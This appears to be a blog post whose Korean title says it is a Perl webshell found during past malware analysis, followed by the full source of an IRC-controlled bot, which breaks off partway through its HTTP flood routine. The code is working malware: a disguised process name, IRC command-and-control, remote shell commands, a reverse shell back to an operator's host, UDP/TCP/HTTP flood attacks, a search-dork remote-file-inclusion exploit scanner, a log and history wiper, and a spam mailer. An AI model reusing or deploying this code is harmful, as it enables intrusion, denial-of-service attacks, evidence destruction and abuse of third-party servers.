예전에 악성코드 분석하다 찾은 perl 웹쉘(pret.jpg)
#!/usr/bin/perl
#
# What is New in V2.0 ? :
#
# + Improved Scanner
# + Improved Configuration
# + Nmap PortScan
# + LogCleaner
# + Mailer
#
#You can use the following commands :
#!bot @portscan <ip>
#!bot @nmap <ip> <beginport> <endport>
#!bot @back <ip><port>
#!bot @udpflood <ip> <packet size> <time>
#!bot @tcpflood <ip> <port> <packet size> <time>
#!bot @httpflood <site> <time>
#!bot @linuxhelp
#!bot @hajar <vuln> <dork>
#!bot @system
#!bot @milw0rm
#!bot @logcleaner
#!bot @sendmail <subject> <sender> <recipient> <message>
#!bot @join <#channel>
#!bot @part <#channel>
#!bot @help
#!bot cd tmp for example
#!bot !eval <code= for example :@nickname>
#
#
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
######################
use HTTP::Request;
use LWP::UserAgent;
######################
my $processo = '/usr/sbin/httpd -k start Ps-X';
######################
#####################################################################
#/!\ .:CONFIGURATION:. /!\#
#####################################################################
############################################
my $linas_max='8';
#----------------- #
# Maximum Lines for Anti Flood #
#############################################
my $sleep='5';
#----------------- #
#Sleep Time #
############################################
my $cmd="http://localhost/cmd.txt??";
#----------------- #
#CMD that is printed in the channel #
############################################
my $id="http://localhost/id.txt";
#----------------- #
#ID = Response CMD #
############################################
my @adms=("S3T4NG");
#----------------- #
#Admins of the Bot set your nickname here #
############################################
my @canais=("#cyberbintauna");
#----------------- #
#Put your channel here #
############################################
my @nickname = ("S3T4NG|");
my $nick = $nickname[rand scalar @nickname];
#----------------- #
#Nickname of bot #
############################################
my $ircname ='PSX';
chop (my $realname = 'PSX');
#----------------- #
#IRC name and Realname #
############################################
$servidor='irc.ps-x.org' unless $servidor;
my $porta='6667';
#----------------- #
#IRCServer and port #
############################################
#####################################################################
#/!\ .:CONFIGURATION:. /!\#
#####################################################################
######################
#End of Configuration#
# #
######################
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
#Connect
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Masalah fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con",
PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.17 PitBull\001");
}
if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
#End of Connect
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
######################
# PREFIX #
# #
######################
# You can change the prefix if you want but the commands will be different
# The standard prefix is !bot if you change it into !bitch for example
# every command will be like !bitch @udpflood, !bitch @googlescan.
# So its recommended not to change this ;)
######################
if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
######################
# End of PREFIX #
# #
######################
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
######################
# Help #
# #
######################
if ($funcarg =~ /^help/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 Select the function you want help for");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ ddos");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ hajar");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ backconnect");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ shell");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ portscanner");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 Or if you want too know all the commands type:");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ commands");
}
if ($funcarg =~ /^ddos/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 There are 3 DDossers in this bot");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 UDPFlood, HTTPFlood and TCPFlood");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ udpflood <ip> <packet size> <time>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ tcpflood <ip> <port> <packet size> <time>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ httpflood <site> <time>");
}
if ($funcarg =~ /^rfiscan/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 This bot also contains a RFI Scanner.");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 That contains the engines : 12G 1o 8o 12g 9l 1e 1, 7M 1S 7N 1, 7A ll 7T he 7W eb 1, 14A 1S 14K 1, 7AOL, 1L 7yc 1o 7s 1, 13Y 6ahoo ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 Commands :");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ hajar <vuln> <dork>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 You can find strings here : http://www.geocities.com/retro_nine_suck//bug.scan.txt ");
}
if ($funcarg =~ /^backconnect/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 You use backconnect like this :");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ back <ip><port>");
}
if ($funcarg =~ /^shell/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 This bot has a integrated shell");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 You can use it in private but also public in the channel");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 In public channel just use : 7!bot cd tmp 12 for example");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 For help with the linux commands type : !bot 7@ linuxhelp");
}
if ($funcarg =~ /^portscanner/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 There is a normal portscan and a Nmap:");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ portscan <ip>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ nmap <ip> <beginport> <endport>");
}
if ($funcarg =~ /^commands/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 You can use the following commands :");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ portscan <ip>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ nmap <ip> <beginport> <endport>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ back <ip><port>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot cd tmp 12 for example");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ udpflood <ip> <packet size> <time>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ tcpflood <ip> <port> <packet size> <time>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ httpflood <site> <time>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ linuxhelp");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ hajar <vuln> <dork>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ system");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ logcleaner");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ sendmail <subject> <sender> <recipient> <message>");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ milw0rm");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ join #channel");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Help 12:. 1| 12 !bot 7@ part #channel");
}
if ($funcarg =~ /^linuxhelp/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LiNuX 12:. 1| - 12 Dir where you are : pwd");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LiNuX 12:. 1| - 12 Start a Perl file : perl file.pl");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LiNuX 12:. 1| - 12 Go back from dir : cd ..");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LiNuX 12:. 1| - 12 Force to Remove a file/dir : rm -rf file/dir;ls -la");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LiNuX 12:. 1| - 12 Show all files/dir with permissions : ls -lia");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LiNuX 12:. 1| - 12 Find config.inc.php files : find / -type f -name config.inc.php");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LiNuX 12:. 1| - 12 Find all writable folders and files : find / -perm -2 -ls");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LiNuX 12:. 1| - 12 Find all .htpasswd files : find / -type f -name .htpasswd");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LiNuX 12:. 1| - 12 Find all service.pwd files : find / -type f -name service.pwd");
}
######################
# End of Help #
# #
######################
######################
# Commands #
# #
######################
if ($funcarg =~ /^system/) {
$uname=`uname -a`;$uptime=`uptime`;$ownd=`pwd`;$distro=`cat /etc/issue`;$id=`id`;$un=`uname -sro`;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1System Info 12:. 1| 12Info BOT : 7 Servidor :Hiden : 6667");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1System Info 12:. 1| 12Uname -a : 7 $uname");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1System Info 12:. 1| 12Uptime : 7 $uptime");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1System Info 12:. 1| 12Own Prosses : 7 $processo");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1System Info 12:. 1| 12ID : 7 $id");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1System Info 12:. 1| 12Own Dir : 7 $ownd");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1System Info 12:. 1| 12OS : 7 $distro");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1System Info 12:. 1| 12Owner : 7 S3T4NG");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1System Info 12:. 1| 12Channel : 7 #BINTAUNA");
}
if ($funcarg =~ /^milw0rm/) {
my @ltt=();
my @bug=();
my $x;
my $page="";
my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$socke>;
$page="@r";
close($socke);
while ($page =~ m/<title>(.*)</g){
$x = $1;
if ($x =~ /\<\;/) {
$x =~ s/\<\;/</g;
}
if ($x !~ /milw0rm/) {
push (@bug,$x);
}}
while ($page =~ m/<link.*expl.*([0-9]...)</g) {
if ($1 !~ m/milw0rm.com|exploits|en/){
push (@ltt,"http://www.milw0rm.com/exploits/$1 ");
}}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 9milw0rm 12:. 1| 12 Latest exploits : ");
foreach $x (0..(@ltt - 1)) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 9milw0rm 12:. 1| 12 $bug[$x] - $ltt[$x]");
sleep 1;
}}
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
######################
# Portscan #
# #
######################
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my
@portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Port Scan 12:. 1| 12 Scanning for open ports on 1".$1." 12 started .");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>
'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Port Scan 12:. 1| 12 Open ports founded: @aberta");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Port Scan 12:. 1| 12 No open ports foundend. ");
}
}
######################
# End of Portscan #
# #
######################
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
######################
# Nmap #
# #
######################
if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){
my $hostip="$1";
my $portstart = "$2";
my $portend = "$3";
my (@abertas, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Nmap PortScan 12:. 1| 1: $1 12.: 1Ports 12:. 1 $2-$3");
foreach my $porta ($portstart..$portend){
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
if ($scansock) {
push (@abertas, $porta);
$scansock->close;
if ($xstats){
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Nmap PortScan 12:. 1| 12Founded 1 $porta"."/Open");
}
}
}
if (@abertas) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Nmap PortScan 12:. 1| Complete ");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Nmap PortScan 12:. 1| No open ports have been founded 13");
}
}
######################
# End of Nmap #
# #
######################
#
# The PitBull !!!!
#
######################
# Log Cleaner #
# #
######################
if ($funcarg =~ /^logcleaner/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LogCleaner 12:. 1| 12 This process can be long, just wait");
system 'rm -rf /var/log/lastlog';
system 'rm -rf /var/log/wtmp';
system 'rm -rf /etc/wtmp';
system 'rm -rf /var/run/utmp';
system 'rm -rf /etc/utmp';
system 'rm -rf /var/log';
system 'rm -rf /var/logs';
system 'rm -rf /var/adm';
system 'rm -rf /var/apache/log';
system 'rm -rf /var/apache/logs';
system 'rm -rf /usr/local/apache/log';
system 'rm -rf /usr/local/apache/logs';
system 'rm -rf /root/.bash_history';
system 'rm -rf /root/.ksh_history';
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LogCleaner 12:. 1| 12 All default log and bash_history files erased");
sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LogCleaner 12:. 1| 12 Now Erasing the rest of the machine log files");
system 'find / -name *.bash_history -exec rm -rf {} \;';
system 'find / -name *.bash_logout -exec rm -rf {} \;';
system 'find / -name "log*" -exec rm -rf {} \;';
system 'find / -name *.log -exec rm -rf {} \;';
sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1LogCleaner 12:. 1| 12 Done! All logs erased");
}
######################
# End of Log Cleaner #
# #
######################
#
# The PitBull !!!!
#
######################
# MAILER #
# #
######################
# For mailing use :
# !bot @sendmail <subject> <sender> <recipient> <message>
#
######################
if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Mailer 12:. 1| 12 Sending Mail to : 2 $3");
$subject = $1;
$sender = $2;
$recipient = $3;
@corpo = $4;
$mailtype = "content-type: text/html";
$sendmail = '/usr/sbin/sendmail';
open (SENDMAIL, "| $sendmail -t");
print SENDMAIL "$mailtype\n";
print SENDMAIL "Subject: $subject\n";
print SENDMAIL "From: $sender\n";
print SENDMAIL "To: $recipient\n\n";
print SENDMAIL "@corpo\n\n";
close (SENDMAIL);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Mailer 12:. 1| 12 Mail Sended To : 2 $recipient");
}
######################
# End of MAILER #
# #
######################
######################
# Join And Part #
# #
######################
if ($funcarg =~ /^join (.*)/) {
sendraw($IRC_cur_socket, "JOIN ".$1);
}
if ($funcarg =~ /^part (.*)/) {
sendraw($IRC_cur_socket, "PART ".$1);
}
######################
#End of Join And Part#
# #
######################
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
######################
# TCPFlood #
# #
######################
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1TCP DDos 12:. 1| 12 Attacking 1 ".$1.":".$2." 12for 1 ".$3." 12seconds. ");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket,"PRIVMSG $printl : 1| 12.: 1TCP DDos 12:. 1| 12Attack done 1 ".$1.":".$2.".");
}
######################
# End of TCPFlood #
# #
######################
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
######################
# Back Connect #
# #
######################
if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);
if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1BackConnect 12:. 1| 12 Connecting to 1 $host:$porta");
}
}
######################
#End of Back Connect#
# #
######################
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
######################
# MULTI SCANNER #
# #
######################
if ($funcarg =~ /^hajar\s+(.*?)\s+(.*)/){
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my $bug=$1;
my $dork=$2;
my $contatore=0;
my %hosts;
### Start Message
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 hajar 1$bug 12$dork");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 tungguin ya say ");
### End of Start Message
# Starting Google
my @glist=&google($dork);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 12G 1o 8o 12g 9l 1e 1 ".scalar(@glist)." 12Sites");
#
my @mlist=&msn($dork);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 7M 1S 7N 1 ".scalar(@mlist)." 12Sites");
#
my @allist=&alltheweb($dork);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 7A ll 7T he 7W eb 1 ".scalar(@allist)." 12Sites");
#
my @asklist=&ask($dork);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 14A 1S 14K 1 ".scalar(@asklist)." 12Sites");
#
my @aollist=&aol($dork);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 7AOL 1 ".scalar(@aollist)." 12Sites");
#
my @lycos=&lycos($dork);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 1L 7yc 1o 7s 1 ".scalar(@lycos)." 12Sites");
#
my @ylist=&yahoo($dork);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 13Y 6ahoo 1 ".scalar(@ylist)." 12Sites");
#
push(my @tot, @glist, @mlist, @alist, @allist, @asklist, @aollist, @lycos, @ylist );
my @puliti=&unici(@tot);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 Total Results: 1 ".scalar(@tot)." 12Sites and Cleaned: 1 ".scalar(@puliti)." 12for 2 $dork ");
my $uni=scalar(@puliti);
foreach my $sito (@puliti)
{
$contatore++;
if ($contatore %30==0){
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| 12 Exploiting 1 ".$contatore." 12of 1 ".$uni. " 12Sites");
}
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Scan 12:. 1| lemes wes 2 $dork");
}
### Print CMD and TEST CMD###
my $test="http://".$sito.$bug.$id."?";
my $print="http://".$sito.$bug.$cmd."?";
### End of Print CMD and TEST CMD###
my $req=HTTP::Request->new(GET=>$test);
my $ua=LWP::UserAgent->new();
$ua->timeout(5);
my $response=$ua->request($req);
if ($response->is_success) {
my $re=$response->content;
if($re =~ /Mic22/ && $re =~ /uid=/){
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Safe Mode = 1OFF 12:. 1| 12 12Vuln: 1$print ");
}}
elsif($re =~ /Mic22/)
{
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1Safe Mode = 3ON 12:. 1| 12 12Vuln: 1$print ");
}}
}}}
exit;
}}}
######################
#End of MultiSCANNER #
# #
######################
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
# RESERVED xD
########################################################################################################################
# ______ __ ___ _ __ ___ __ __ #
#/_ __/ / / ___ / _ \ (_) / /_ / _ ) __ __ / / / / #
# / / / _ \/ -_) / ___/ / / / __/ / _ |/ // / / / / / #
#/_/ /_//_/\__/ /_/ /_/ \__/ /____/ \_,_/ /_/ /_/ #
# #
########################################################################################################################
######################
# HTTPFlood #
# #
######################
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 1| 12.: 1HTTP DDos 12:. 1| 12 Attacking 1 ".$1." 12 on port 80 for 1 ".$2." 12 seconds .");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
